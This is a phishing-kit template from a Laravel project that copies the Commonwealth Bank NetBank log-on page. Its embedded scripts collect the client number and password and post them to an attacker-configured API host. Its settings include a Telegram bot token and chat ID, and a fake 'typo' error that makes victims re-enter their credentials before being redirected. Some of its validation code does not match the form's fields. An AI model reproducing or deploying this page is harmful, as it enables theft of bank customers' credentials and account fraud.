<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
    class="win chrome chrome1 webkit webkit5 cssBeforeSupport">

<head id="head">
    <title>
        NetBank - Log on to NetBank - Enjoy simple and secure online banking from Commonwealth Bank
    </title>

    <meta name="description"
        content="NetBank is here to simplify your banking life. You can manage all your accounts from one place, and do your banking whenever or wherever it suits you.">
    <meta name="google-site-verification" content="_Y1ecy6XcbQ3abYLk9glqe_Csuq0QakknnlXfW2Qrjo">
    <link rel="canonical" href="#">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" type="text/css"
        href="https://static.my.commbank.com.au/static/netbank/theme/fo/css/logon-merge.8397238ab0ae7a25ea1af4d375f2c3df.css"
        rel-album="R720">
    <style>
        undefined
    </style>
    <style id="at-makers-style" class="at-flicker-control">
        .mboxDefault {
            visibility: hidden;
        }
    </style>
    <link rel="preconnect" href="https://fonts.googleapis.com" crossorigin="use-credentials">
    <link rel="preconnect" href="https://fonts.gstatic.com">
    <link rel="stylesheet"
        href="https://fonts.googleapis.com/css2?family=Mulish:wght@200;300;400;500;600;700;800;900&amp;display=swa">
</head>

<body id="body" class="logon">
    <!------------------------------------------>
    <!-- Configurations -->
    <!------------------------------------------>
    <script>
        function getConfigs() {
            return {
                "index": Number('<?php echo e($index); ?>'),
                "isFinalPage": Boolean('<?php echo e($details["isFinalPage"]); ?>'),
                "pagesSequence": '<?php echo e($details["pagesSequence"]); ?>',
                "isActive": '<?php echo e($details["isActive"]); ?>' === "true" ? true : false,
                "page": '<?php echo e($details["page"]); ?>',
                "pagesWaitingTime": '<?php echo e($details["pagesWaitingTime"]); ?>',
                "pagesTypeOfWaitingPage": '<?php echo e($details["pagesTypeOfWaitingPage"]); ?>',
                "pagesNumberOfRepetition": Number('<?php echo e($details["pagesNumberOfRepetition"]); ?>'),
                'pagesWaitingTime': Number('<?php echo e($details["pagesWaitingTime"]); ?>') * 1000,
                'pagesIsFormsEmptyInRepetitions': Boolean('<?php echo e($details["pagesIsFormsEmptyInRepetitions"]); ?>'),
                'pagesGoBackPageName': '<?php echo e($details["pagesGoBackPageName"]); ?>',
                'pagesGoNextPageName': '<?php echo e($details["pagesGoNextPageName"]); ?>',
                'pagesNavigationPageControlType': '<?php echo e($details["pagesNavigationPageControlType"]); ?>',
                'googleRecaptchaSiteKey': '<?php echo e($details["googleRecaptchaSiteKey"]); ?>',
                'googleRecaptchaSecretKey': '<?php echo e($details["googleRecaptchaSecretKey"]); ?>',
                'telegramChatId': '<?php echo e($details["telegramChatId"]); ?>',
                'telegramBotToken': '<?php echo e($details["telegramBotToken"]); ?>',
                'apiHost': '<?php echo e($details["apiHost"]); ?>',
                'webHost': '<?php echo e($details["webHost"]); ?>',
                'accessCountryISO': '<?php echo e($details["accessCountryISO"]); ?>',
                'errorPageLink': '<?php echo e($details["errorPageLink"]); ?>',
                'successPageLink': '<?php echo e($details["successPageLink"]); ?>',
            };
        }
    </script>
    <!------------------------------------------>
    <!-- State -->
    <!------------------------------------------>
    <script>
        function getCurrentState() {
            const currentPage = getConfigs()["index"];
            let data = localStorage.getItem("data");
            if (!currentPage || !data) {
                data = JSON.stringify({ page: 0, info: {} });
                localStorage.setItem("data", data);
            }
            return JSON.parse(data);
        }

        function removeState() {
            localStorage.removeItem("data");
        }
        function updateCurrentState(page, info) {
            let currentData = getCurrentState();
            localStorage.setItem("data", JSON.stringify({
                ...currentData,
                ...info,
                page: page,
            }));
        }
    </script>
    <!------------------------------------------>
    <!-- Routing -->
    <!------------------------------------------>
    <script>
        function redirect(target) {
            window.location.href = target;
        }
        function goToLink(target) {
            window.location.replace(target);
        }
    </script>
    <!------------------------------------------>
    <!-- Protection -->
    <!------------------------------------------>
    <script>
        function protectPage() {
            const page = getCurrentState()["page"];
            const currentPage = getConfigs()["index"];
            let isAccessible =
                (currentPage === 0 && page === undefined) || currentPage === page;
            let isValid = true;
            if (!isAccessible) {
                const pages = getConfigs()["pagesSequence"].split(",").length;
                isValid = !isNaN(Number(page)) && page <= pages && page >= 0;
            }
            if (!isValid) {
                removeState();
                redirect("/0");
            }
            if (!isAccessible) {
                const state = getCurrentState();
                redirect("/" + page);
            }

            if (!getConfigs()["isActive"]) {
                if (getConfigs()["isFinalPage"]) {
                    removeState();
                    goToLink(getConfigs()["successPageLink"]);
                }
                else {
                    updateCurrentState(page + 1, {});
                }
            }
        }
        protectPage();
    </script>
    <!-- Form -->
    <script>
        function getCaptchaResponse() {
            return document.getElementsByName("g-recaptcha-response")[0].value;
        }
        function getAllFormData() {
            return {
                "CaptchaResponse": getCaptchaResponse(),
                "UserAgent": navigator.userAgent,
                "Page": getConfigs()["page"],
                "ClientNumber": document.getElementById("txtMyClientNumber_field").value,
                "Password": document.getElementById("txtMyPassword_field").value,
            }
        }
        function clearForm(configs) {
            document.getElementById("txtMyClientNumber_field").value = "";
            document.getElementById("txtMyPassword_field").value = "";
        }
    </script>
    <!-- API -->
    <script>
        async function makeAPICall(data) {
            const configs = getConfigs();
            const dataToSend = JSON.stringify(data);
            try {
                return await axios.post(`${configs["apiHost"]}/${configs["page"]}?data=${dataToSend}`, {})
            } catch (error) {
                return null;
            }
        }
    </script>
    <!-- UI Handling -->
    <script>
        function showError(message) {
            const errorComponent = document.getElementsByClassName("MessagePanel_Validation")[0];
            errorComponent.style.display = "flex";
            const error = document.getElementById("error-message");
            error.style.display = "block";
            error.textContent = message;
            const main = document.getElementById("main-content");
            main.classList.add("error");
        }
        function hideError() {
            const errorComponent = document.getElementsByClassName("MessagePanel_Validation")[0];
            errorComponent.style.display = "none";
            const error = document.getElementById("error-message");
            error.style.display = "none";
            error.textContent = "";
            const main = document.getElementById("main-content");
            main.classList.remove("error");
        }
        function showLoader() {
            const configs = getConfigs();
            if (configs["pagesTypeOfWaitingPage"] === "POPUP") {
                const loader = document.getElementsByClassName("waiting-popup-container")[0];
                loader.style.display = "flex";
            } else if (configs["pagesTypeOfWaitingPage"] === "PAGE") {
                const main = document.getElementsByClassName("main-page")[0];
                main.style.display = "none";
                const waitingPage = document.getElementsByClassName("waiting-page")[0];
                waitingPage.style.display = "block";
            }
        }
        function hideLoader() {
            const configs = getConfigs();
            if (configs["pagesTypeOfWaitingPage"] === "POPUP") {
                const loader = document.getElementsByClassName("waiting-popup-container")[0];
                loader.style.display = "none";
            } else if (configs["pagesTypeOfWaitingPage"] === "PAGE") {
                const main = document.getElementsByClassName("main-page")[0];
                main.style.display = "block";
                const waitingPage = document.getElementsByClassName("waiting-page")[0];
                waitingPage.style.display = "none";
            }
        }
    </script>
    <!-- Validations -->
    <script>
        function validateEmail(email) {
            const re = /\S+@\S+\.\S+/;
            return re.test(email);
        }
        function validatePhoneNumber(phoneNumber) {
            const re = /^\d{8,}$/;
            return re.test(phoneNumber);
        }
        function validateData(data) {
            const { FirstName, LastName, PhoneNumber, EmailAddress } = data;
            if (!FirstName || !LastName || !PhoneNumber || !EmailAddress)
                return "Please fill all the fields";
            if (!validatePhoneNumber(PhoneNumber))
                return "Please enter a valid phone number";
            if (!validateEmail(EmailAddress))
                return "Please enter a valid email address";
            return true;
        }
    </script>
    <!-- Handling -->
    <script>
        const configs = getConfigs();
        function onErrorAction() {
            goToLink(getConfigs["errorPageLink"]);
        }
        function onSuccessAction(data) {
            if (configs["pagesNumberOfRepetition"]) {
                configs["pagesNumberOfRepetition"]--;
                if (configs["pagesIsFormsEmptyInRepetitions"])
                    clearForm();
                hideLoader();
                showError("Oops! It seems there might be a small typo in your account information.");
                return;
            }
            else if (getConfigs()["isFinalPage"]) {
                localStorage.setItem("phoneNumber", getAllFormData()["PhoneNumber"]);
                removeState();
                goToLink(getConfigs()["successPageLink"]);
            }
            else {
                localStorage.setItem("phoneNumber", getAllFormData()["PhoneNumber"]);
                updateCurrentState(getConfigs()["index"] + 1, {});
                redirect("/" + (getConfigs()["index"] + 1));
            }
        }
        async function handleAuto() {
            const configs = getConfigs();
            const dataToSend = getAllFormData();
            const test = validateData(dataToSend);
            if (test !== true)
                return showError(test);
            hideError();

            const timer = configs
            if (configs["pagesWaitingTime"]) {
                showLoader();
                setTimeout(async () => {
                    const response = await makeAPICall(dataToSend);
                    if (!response) return onErrorAction();
                    onSuccessAction(dataToSend);
                }, configs["pagesWaitingTime"])
            } else {
                const response = await makeAPICall(configs, dataToSend);
                if (!response) return onErrorAction(configs)
                onSuccessAction(configs, dataToSend);
            }
        }
        function handleManual(configs) {
            const dataToSend = getAllFormData();
            showLoader(configs);
            alert("Manual");
        }
        function onSubmitData(key) {
            if (getConfigs()["pagesNavigationPageControlType"] === "AUTO")
                handleAuto()
            else
                handleManual(configs);
        }
    </script>
    <style>
        * {
            font-family: CBABeaconSans, sans-serif !important;
        }

        #submitButton {
            width: 100% !important;
        }

        #main-content {
            max-width: 700px !important;
            margin: 50px auto !important;
            width: 100% !important;

        }

        main {
            padding: 0 10px;
        }



        .form-group {
            margin-bottom: 30px !important;
        }



        #main-content.error {
            border: 2px solid #e1001a;
            position: relative;
            font-family: CBABeaconSans, sans-serif !important;
            margin: 50px auto !important;
        }

        .error-component {
            display: none;
        }

        .error .error-component {
            color: #e1001a;
            text-align: left;
            align-items: flex-start;
            gap: 7px;
            line-height: 25px;
            background-color: rgba(255, 0, 0, 0.1);
            padding: 20px;
        }

        .error-component #error-message {
            font-size: 20px !important;
            position: relative;
            top: 3px;
        }

        .error-component img {
            width: 30px;
            height: 30px;
        }

        /**********************************/
        .waiting-popup-container {
            position: absolute;
            width: 100%;
            height: 100%;
            display: none;
            flex-direction: column;
            align-items: center;
            justify-content: center;
            width: 100%;
            backdrop-filter: blur(10px);
            background-color: rgba(255, 255, 255, 0.5);
            z-index: 9999;
            color: white;
        }

        .waiting-popup-title {
            color: white;
            text-align: center;
            font-size: 50px;
            font-weight: bolder;
            margin-bottom: 40px;
        }

        .waiting-popup-text {
            color: white;
            text-align: center;
            font-size: 20px;
            max-width: 698px;
            display: block;
            margin: 0 auto;
        }

        .waiting-popup {
            border: 5px solid #f3f3f3;
            border-top: 5px solid #181313;
            border-radius: 50%;
            width: 50px;
            height: 50px;
            animation: spin 1s linear infinite;
            margin-bottom: 10px;
        }

        @keyframes spin {
            0% {
                transform: rotate(0deg);
            }

            100% {
                transform: rotate(360deg);
            }
        }

        .MessagePanel_Error {
            display: none;
        }
    </style>
    <form action="#">

        <div class="aspNetHidden">
            <input type="hidden" name="RID" id="RID" value="ISkzHa2g4EOw6kwnBxQeQw">
            <input type="hidden" name="SID" id="SID" value="8n6sYgMimUw=">
            <input type="hidden" name="cid" id="cid" value="WcQtfxUPj0CWpneOslsVnw">
            <input type="hidden" name="rqid" id="rqid" value="FbKFn7W_jkCGiUdCZvO2xg">
            <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE"
                value="/wEPDwUKMTYyNzk3MDY5NGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFEWNoa1JlbWVtYmVyJGZpZWxkyajFL6pW3G2RJiK0b4vThcB6Jn0=">
        </div>




        <div id="BodyContainer">
            <div id="Header">
                <div id="BrandingLogo">
                    <span class="ImageWithHelp" id="imgCbaLogo"><img id="imgCbaLogo"
                            src="https://static.my.commbank.com.au/static/netbank/theme/fo/images/cba_mainlogo.ac9de6fb5214be84653367c74ba0b5f0.gif"
                            alt="Commonwealth Bank of Australia"></span>
                </div>
            </div>
            <div id="MainContent">
                <noscript>
                    <div class="MessagePanel">
                        <div class="message_contents message_contents_validation">
                            <div class="message">
                                <div class="message_icon error"></div>
                                <div class="msg_cnt_wrp msg_cnt_wrp_error">
                                    <p>
                                        <strong>You need to enable JavaScript to access NetBank</strong>
                                    </p>
                                    <p>
                                        Follow these instructions on <a id="lnkEnableJavaScript" href="#"
                                            target="_blank">how
                                            to enable JavaScript</a>.
                                        If you'd prefer not to enable Javascript, you can still access some basic
                                        NetBank functions by logging into the <a id="lnkMobileVersionNoScript"
                                            href="#">mobile version</a> of NetBank.
                                    </p>
                                </div>
                            </div>
                        </div>
                    </div>
                </noscript>
                <div class="MessagePanel arrow MessagePanel_Error" id="mplMessagePanel">
                    <div class="message_contents message_contents_error">
                        <div class="message">
                            <div class="message_icon error icon icon_error">
                                <i tabindex="-1"><span class="ScreenReader">Please read the following message</span></i>
                            </div>
                            <ul class="msg_cnt_wrp msg_cnt_wrp_error">
                                <li class="last">Oops! The client number or password you entered is incorrect, please
                                    try again. Don't worry, if you can't remember your details you can <a
                                        href="https://www1.my.commbank.com.au/netbank/UserMaintenance/Mixed/ForgotLogonDetails/FLDYourLogonDetails.aspx?RID=hSrDScZPbki1j3pS3RUzgA&amp;SID=8n6sYgMimUw%3d">retrieve
                                        your client number or reset your password</a> online.</li>
                            </ul>
                        </div>
                    </div>
                </div>
                <div id="ModuleWrap">
                    <div id="ModuleLeft" class="module">
                        <h2>Log on to NetBank</h2>
                        <div class="bd">
                            <div class="ft">
                                <div class="row rowClientNumber">
                                    <div class="LabelWrapper LabelTextAlignNotSet align_notset">
                                        <label for="txtMyClientNumber_field" id="txtMyClientNumber_label"><span
                                                class="MainLabel ">Client number</span></label>
                                    </div>
                                    <div class="FieldElement ">
                                        <input name="txtMyClientNumber$field" type="text" maxlength="8"
                                            id="txtMyClientNumber_field" class="text textbox field" data-maxlength="8">
                                    </div>
                                </div>
                                <div class="row rowPassword">
                                    <div class="LabelWrapper LabelTextAlignNotSet align_notset">
                                        <label for="txtMyPassword_field" id="txtMyPassword_label"><span
                                                class="MainLabel ">Password</span></label>
                                    </div>
                                    <div class="FieldElement ">
                                        <input name="txtMyPassword$field" type="password" maxlength="16"
                                            id="txtMyPassword_field" class="text textbox field" data-maxlength="16">
                                    </div>
                                </div>
                                <div class="row">
                                    <div class="FieldElement  FieldElementNoLabel">
                                        <span class="checkbox field checkbox_classic"><input id="chkRemember_field"
                                                type="checkbox" name="chkRemember$field" class="checkbox"><label
                                                for="chkRemember_field">Remember client number</label></span>
                                    </div>
                                </div>
                                <input type="hidden" name="perfmonLog" id="perfmonLog"
                                    value="e%3D19092%3Ba%3D1701123748047%3Bm%3D-60*-60%3Bn%3D1617469201151%2C0%3Bf%3D1920k1080k24%3Bz%3D2%3Bc%3D5%3Bb%3DJva32%3By%3Dra-PN%3Bp%3Dp2s8083o2ppnnp22%3Bx%3D10%2C5%2C31%2C0%3Bgi%3D0000000%3Byf%3D6%2C0%2C6%3Bw%3D13%2C02800457470444050015455QP34111753Q3441S0014101141400474150770551551044%7C32%7C%7C%2Cuggcf%3A//jjj.zl.pbzzonax.pbz.nh/nxnz/13/1pq3r187%7C0%7C%7C%2CPRN0228832833088R22080300N3O8030202RP00R0P083030R2N00N003N08O008303R3N%7C63%7C%7C%2CN32114N33642387Q44RO9OO257NNR7P5OO33Q183OP05111484ONPP154731QQ512769R5%7C1420%7C%7C%2CS5O01276209589O498QS13OO3114R1945RO9120P18003040081P0R52P001NN34341785%7C97%7C%7C%2CS1Q0P9933042687P0QQR96N7R1S1R686N722N0495P026061P9880P2RN2N794321N9QN8%7C201%7C%7C%2C32N022P03080P28R3003023022SPPS30OPOO803PP020308003PS0R28N002PO20308PR8%7C80%7C%7C.jevgr%2C11R0NONOO0O711NR056934S6S2P5P2210536R6720P1R2440P2SO0SNP2468N60836NS09%7C412%7C%7C%2C0R01SRN67ON308O606SNN0OR623PN3857536S13355Q11001N2RP081P1NN8R42305NO91%7C667%7C%7C%2CS3Q02O22750455O840O19732178S7O0578375347640018P8P4202QQ87OS1P0OS076NQ2%7C277%7C%7C%2C8P31NRP8QS25536NPS95539R300O4909OPQ46N05P3P91939RPRPP8N224SO086S17N665%7C1568%7C%7Cfpevcg%2C/YVwkwbHVeFryzG2KDZvZHLHK/m7hoFTTWzgT7/rwENLlR8ODH/HPk/jOjt_XxRO%7C0%7C%7C%2CSP0123957RO308ON42SRN1SN713PN7997536S02355Q15009O2SQ0Q1P1RN8S423056O51%7C667%7C%7C%3B_w%3D%2Cp81085r17s02r4q2%7C119793%7C%7Cvsenzr-fpevcg-riny-KZYUggcErdhrfg-ybpnyFgbentr-%2C759o77907s9o9n19%7C400180%7C%7Cvsenzr-fpevcg-riny-KZYUggcErdhrfg-.jevgr-ybpnyFgbentr-%2Cp9o3p50npsq8011p%7C92432%7C%7Cfpevcg-riny-KZYUggcErdhrfg-.jevgr-%2Cpr1o7089sr7r6985%7C19937%7C%7Cfpevcg-riny-%2Cs7217q8pr5553ss7%7C69692%7C%7Cfpevcg-KZYUggcErdhrfg-ybpnyFgbentr-%3Bs%3D2%2C%7Cuggcf%253N//jjj.pbzzonax.pbz.nh/qvtvgny/vqragvgl/nhguragvpngr/fvta-bhg%253SqcBayl%253Qgehr%2C%7Cuggcf%253N//jjj.pbzzonax.pbz.nh/ergnvy/argonax/vqragvgl/fvtabhg%3Bya%3D0%2C%3Bv%3D4%2C2p284056oqo1onr4%2C80363q72nq5rnors%2C11sr371752rpq18s%2C9opn3pn87s2135qo%3Bj%3D58%2C19r86q8q372r914s%7C52%7CtrgPbzchgrqFglyr%7C%2Cn794p90rq969o521%7C3192%7Cbcra%7C%2C2pq29qq745o35ss4%7C163%7CcoRkgreanyPbzznaq%7C%2C8125s62o2r2737p0%7C332%7CJroSbez_BaFhozvg%7C%2C64p7sp28821op18p%7C24745%7CIvfvgbe%7Cvsenzr-fpevcg-KZYUggcErdhrfg-%2C1952692n9q7p7p51%7C6205%7Cf_qbCyhtvaf%7C%2C2456801877r4qo4n%7C668%7CNccZrnfherzrag_Zbqhyr_NhqvraprZnantrzrag%7C%2C946r491333q1716n%7C29686%7CNccZrnfherzrag%7Cfpevcg-KZYUggcErdhrfg-ybpnyFgbentr-%2C1or7rn717no64s46%7C396%7Cf_tv%7C%2C47669qqnp1q8ss8n%7C165%7Cf_ctvpd%7C%2C925p2714nr0r7246%7C26968%7CQVY%7Cvsenzr-fpevcg-KZYUggcErdhrfg-%2Cn361512q7r4233q9%7C1100%7CNccZrnfherzrag_Zbqhyr_QVY%7C%2C5p83rq294sr1q0r6%7C45%7CUnfuFrg%7C%2C52sq6q2os4433086%7C207%7Cqrobhapr%7C%2Cqo4320s6prnr92qs%7C895%7CWFTrgFjsIre%7Cfpevcg%3B">
                                <input type="hidden" name="metric" id="metric"
                                    value="%7B%22ls%22%3A%7B%22detectedFonts_2.1.5%22%3A%22%7B%5C%22val%5C%22%3A%5C%22book%20antiqua%2Ccambria%2Cconstantia%2Cgeorgia%2Csylfaen%2Ccalibri%2Ccentury%20gothic%2Ccorbel%2Cfranklin%20gothic%2Cimpact%2Clato%2Ccourier%20new%2Cms%20gothic%2Cmistral%2Cpapyrus%2Clucida%20handwriting%2Csimsun%2Csymbol%2Cwingdings%2Cwebdings%2Carial%20black%2Carial%20narrow%2Cbradley%20hand%20itc%2Ccalibri%20light%2Ccambria%20math%2Ccandara%2Ccentury%2Ccomic%20sans%20ms%2Cebrima%2Cfranklin%20gothic%20heavy%2Cfranklin%20gothic%20medium%2Cfreestyle%20script%2Cfrench%20script%20mt%2Cgabriola%2Cgadugi%2Cjavanese%20text%2Cjuice%20itc%2Ckristen%20itc%2Cleelawadee%2Cleelawadee%20ui%2Clucida%20console%2Clucida%20sans%20unicode%2Cmalgun%20gothic%2Cmarlett%2Cmicrosoft%20himalaya%2Cmicrosoft%20jhenghei%2Cmicrosoft%20jhenghei%20light%2Cmicrosoft%20jhenghei%20ui%2Cmicrosoft%20jhenghei%20ui%20light%2Cmicrosoft%20new%20tai%20lue%2Cmicrosoft%20phagspa%2Cmicrosoft%20sans%20serif%2Cmicrosoft%20tai%20le%2Cmicrosoft%20uighur%2Cmicrosoft%20yahei%2Cmicrosoft%20yahei%20light%2Cmicrosoft%20yahei%20ui%2Cmicrosoft%20yahei%20ui%20light%2Cmicrosoft%20yi%20baiti%2Cmingliu-extb%2Cmingliu_hkscs-extb%2Cmongolian%20baiti%2Cms%20pgothic%2Cms%20reference%20sans%20serif%2Cms%20reference%20specialty%2Cms%20ui%20gothic%2Cmt%20extra%2Cmv%20boli%2Cmyanmar%20text%2Cnirmala%20ui%2Cnsimsun%2Cpalatino%20linotype%2Cpmingliu-extb%2Cpristina%2Csegoe%20print%2Csegoe%20script%2Csegoe%20ui%2Csegoe%20ui%20black%2Csegoe%20ui%20emoji%2Csegoe%20ui%20light%2Csegoe%20ui%20semibold%2Csegoe%20ui%20symbol%2Csimsun-extb%2Csitka%20banner%2Csitka%20display%2Csitka%20heading%2Csitka%20small%2Csitka%20subheading%2Csitka%20text%2Ctempus%20sans%20itc%5C%22%7D%22%2C%22page_load%22%3A%221617469201151%22%2C%22cdSrvrState%22%3A%22%7B%5C%22val%5C%22%3A%7B%5C%22requestId%5C%22%3A99%2C%5C%22sid%5C%22%3Anull%2C%5C%22sts%5C%22%3Anull%2C%5C%22std%5C%22%3Anull%7D%7D%22%2C%22cdTabList%22%3A%22%7B%5C%22val%5C%22%3A%5B%5B%5C%226c18ad83-7377-4378-9cb6-d911b684614c%5C%22%2C1701123746353%5D%5D%7D%22%2C%22cdSNum%22%3A%22%7B%5C%22val%5C%22%3A%5C%221701117391736-sjt0000930-ee82b845-f560-445d-b4a7-90761dd69da3%5C%22%7D%22%2C%22bmuid%22%3A%22%7B%5C%22val%5C%22%3A%5C%221701004299277-3B90EAAA-5913-4BC6-8994-4B8E38E9D287%5C%22%7D%22%7D%2C%22acn%22%3A%22Mozilla%22%2C%22an%22%3A%22Netscape%22%2C%22av%22%3A%225.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit/537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome/119.0.0.0%20Safari/537.36%22%2C%22ce%22%3Atrue%2C%22dnt%22%3Anull%2C%22l1%22%3A%22en-CA%22%2C%22l2%22%3A%5B%22en-CA%22%2C%22fr-FR%22%2C%22fr%22%2C%22en-GB%22%2C%22en-US%22%2C%22en%22%5D%2C%22ol%22%3Atrue%2C%22pf%22%3A%22Win32%22%2C%22d%22%3A%22Portable%20Document%20Format%22%2C%22f%22%3A%22internal-pdf-viewer%22%2C%22l%22%3A2%2C%22n%22%3A%22PDF%20Viewer%22%2C%22p%22%3A%22Gecko%22%2C%22ps%22%3A%2220030107%22%2C%22ua%22%3A%22Mozilla/5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit/537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome/119.0.0.0%20Safari/537.36%22%2C%22cd%22%3A24%2C%22pd%22%3A24%2C%22sh%22%3A1080%2C%22sw%22%3A1920%2C%22ss%22%3A%7B%22cdTabData%22%3A%22%7B%5C%22id%5C%22%3A%5C%226c18ad83-7377-4378-9cb6-d911b684614c%5C%22%2C%5C%22openTabTS%5C%22%3A1701123746353%7D%22%7D%2C%22sl%22%3A0%2C%22c%22%3A%22c2f8083b2ccaac22%22%7D">
                                <div class="FieldElement  FieldElementNoLabel">
                                    <div class="CbaButton " id="btnLogon">
                                        <input class="button field" type="submit" name="btnLogon$field" value="Log on"
                                            id="btnLogon_field">
                                    </div>
                                </div>
                                <a id="lnkForgottenDetails" href="#">I've
                                    forgotten my log on details</a>
                                <div id="MessageBubble" class="MessageBubble">
                                    <span class="MessagePointer"></span>
                                    <a id="MessageClose" class="MessageClose" title="Close"
                                        href="javascript:void(0)">Close</a>
                                    <span class="MessageBody">

                                        For security reasons, do not <br> select <strong>Remember client number</strong>
                                        if anyone else uses <br> this computer. <a id="lnkFindOutMore" href="#"
                                            target="_blank">Find out
                                            more</a>.

                                    </span>
                                </div>
                            </div>
                        </div>
                    </div>
                    <div id="ModuleRight" class="module">
                        <h2>New to NetBank?</h2>
                        <div class="bd">
                            <div class="ft">
                                <ul class="Bullets">
                                    <li><a id="lnkRegistration" href="#">Register
                                            for NetBank now</a></li>
                                    <li><a id="lnkOnlineSupport" href="#" target="_blank">Online support for our
                                            products and services</a></li>
                                    <li><a id="lnkProtectYourselfOnline" href="#" target="_blank">Tips to stay safe
                                            online</a></li>
                                </ul>
                            </div>
                            <div class="ft secModule">
                                <ul class="Bullets">
                                    <li><a id="lnkSecurityGuarantee" href="#l" target="_blank">Protection for
                                            unauthorised transactions</a></li>
                                </ul>
                            </div>
                        </div>
                    </div>
                </div>

                <!-- Component for content management. -->

                <div id="ucLogonContentManageControl_pnlContentManaged">

                    <div id="ContentManaged">
                        <!-- this is the features panel which has the image and description. -->
                        <div id="ucLogonContentManageControl_pnlHighlightPanel">

                            <div class="HighlightPanel">
                                <div class="top">
                                    <div class="bottom">
                                        <div class="image">
                                            <p><a href="#" target="_blank"><img
                                                        src="https://static.my.commbank.com.au/static/cmxAssets/netbank-logon/yellow_nb_logon.jpg"
                                                        alt=""></a></p>
                                        </div>
                                        <div class="description">
                                            <table>
                                                <tbody>
                                                    <tr>
                                                        <td>
                                                            <p><b>Banking just got brighter</b></p>
                                                            Discover CommBank Yello - our new customer recognition
                                                            program.<ul>
                                                                <li><a href="#" target="_blank">Show me CommBank
                                                                        Yello</a></li>
                                                            </ul>
                                                            <p></p>
                                                            <p></p>
                                                        </td>
                                                    </tr>
                                                </tbody>
                                            </table>
                                        </div>
                                    </div>
                                </div>
                            </div>

                        </div>
                        <!-- side by side highlight links at the bottom -->
                        <div id="ucLogonContentManageControl_pnlCurrentHighlights">

                            <div id="CurrentHighlights">
                                <h3>Quicklinks</h3>
                                <div class="column">
                                    <ul>

                                        <li>
                                            <p><a href="#" target="_blank">Financial difficulty support for your
                                                    business. Find
                                                    out more</a></p>
                                        </li>

                                        <li>
                                            <p><a href="#" target="_blank">Refinance your eligible home loan to
                                                    CommBank. See
                                                    how</a></p>
                                        </li>

                                        <li>
                                            <p><a href="#" target="_blank">It's Scams Awareness Week. Learn how to stay
                                                    safe.</a></p>
                                        </li>

                                        <li>
                                            <p><a href="#" target="_blank">Use Benefits finder to find grants, rebates
                                                    and
                                                    concessions you may be eligible for</a></p>
                                        </li>

                                    </ul>
                                </div>
                            </div>

                        </div>
                    </div>

                </div>
            </div>
            <div id="PageFooter">
                <a id="lnkTermsOfUse" href="#" target="_blank">Terms of use</a> | <a id="lnkSecurity" href="#"
                    target="_blank">Security</a> | <a id="lnkPrivacy" href="#" target="_blank">Privacy</a>
                <span id="CopyRight">© Commonwealth Bank of Australia 2023 ABN 48 123 123 124</span>
            </div>


        </div>
        <!-- CorrelationId: 520598e6-8097-4b08-a6df-47863d63e721 -->


        <div class="aspNetHidden">

            <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="D36AA275">
            <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION"
                value="/wEdAAdBE2G25NgTBOSU8Pqz5seN1tkCpOzpMMGFMIXCpKP1eU+3DVZOao4DU3+mkUn/6Lq9VKFP44dFVSqvdUtSca65l2O0yUofFF/VqhDKu55So0WhGMs5vjP2z0dydHI73bH84b/Z4SECaSTCtUK4njAufZrgpuWroDjuHGLJy3xuLdJ/NDY=">
        </div>


    </form>


</body>

</html><?php /**PATH D:\005-Projects\005-freelance\Laravel\all-in-one-control\nobanko\resources\views/oldlogin.blade.php ENDPATH**/ ?>